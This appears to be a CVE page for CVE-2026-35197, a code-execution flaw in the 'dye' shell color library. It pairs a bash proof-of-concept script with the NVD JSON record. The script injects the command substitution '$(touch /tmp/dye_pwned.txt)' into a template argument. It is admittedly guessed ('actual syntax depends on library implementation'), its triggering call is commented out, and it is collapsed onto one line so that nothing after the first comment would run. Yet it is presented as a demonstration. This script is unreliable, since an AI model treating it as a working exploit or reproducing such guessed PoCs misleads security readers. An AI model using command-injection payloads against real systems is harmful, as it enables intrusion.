CVE-2026-35197

#!/bin/bash # PoC for CVE-2026-35197 (dye < 1.1.1) # This script demonstrates how a malicious template expression # could trigger arbitrary code execution. # Assume 'dye' is installed or sourced in the environment # source dye.sh echo "[+] Testing CVE-2026-35197 Arbitrary Code Execution in dye" # Vulnerable context: Passing untrusted input to dye's template engine # In versions < 1.1.1, specific syntax (e.g., backticks or command substitution) # within template expressions might be evaluated by the shell. # Example payload: Create a file as proof of execution MALICIOUS_PAYLOAD="\$(touch /tmp/dye_pwned.txt)" # Simulating the vulnerable function call # (Actual syntax depends on library implementation, assuming a generic template usage) # If the library passes the argument directly to 'eval' or similar, execution occurs. echo "[+] Attempting to execute payload: $MALICIOUS_PAYLOAD" # In a real vulnerable scenario, this line would trigger the command: # dye -p "$MALICIOUS_PAYLOAD" # Verification if [ -f /tmp/dye_pwned.txt ]; then echo "[!] SUCCESS: Arbitrary code executed. File /tmp/dye_pwned.txt created." rm /tmp/dye_pwned.txt else echo "[-] FAILED: Exploit did not trigger (library may be patched)." fi

{"cve": {"id": "CVE-2026-35197", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:27.380", "lastModified": "2026-04-16T04:13:42.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "dye is a portable and respectful color library for shell scripts. Prior to 1.1.1, certain dye template expressions would result in execution of arbitrary code. This issue was discovered and fixed by dye's author, and is not known to be exploited. This vulnerability is fixed in 1.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattiebee:dye:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F287B375-FA78-48A2-9AB8-646B70D81484"}]}]}], "references": [{"url": "https://github.com/mattieb/dye/security/advisories/GHSA-3v4r-5vfh-3wjr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://mattiebee.io/dye-template-advisory", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}